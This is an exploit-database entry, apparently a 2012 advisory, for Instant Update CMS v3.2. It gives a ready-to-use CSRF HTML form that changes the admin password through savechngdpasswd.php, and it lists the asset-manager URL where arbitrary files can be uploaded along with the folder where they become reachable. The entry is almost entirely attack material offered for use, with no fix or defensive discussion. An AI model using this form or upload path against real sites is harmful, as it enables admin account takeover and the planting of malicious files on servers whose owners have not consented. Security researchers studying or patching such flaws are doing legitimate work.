id: 18408
date: 06/01/2012
title: Instant Update CMS v3.2 Arbitrary File Upload/CSRF Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Instant Update CMS v3.2  Arbitrary File Upload/CSRF Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cubescripts.com/cms-script.php

#######################################################################

===[ Exploit ]===


CSRF [Change Password Admin]
=============================

<form method="POST" name="form1" action="http://SITE/manage/savechngdpasswd.php">
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="Password"/>
<input type="hidden" name="image.x" value="33"/>
<input type="hidden" name="image.y" value="11"/>
<input type="hidden" name="image" value="edit"/>
</form>

</body>
</html>


Remote Arbitrary File Upload
================================


http://SITE/manage/scripts/assetmanager/assetmanager.php?ffilter=media

Your File

http://SITE/UserFiles/

#######################################################################



#  0day.today [2023-03-22]  #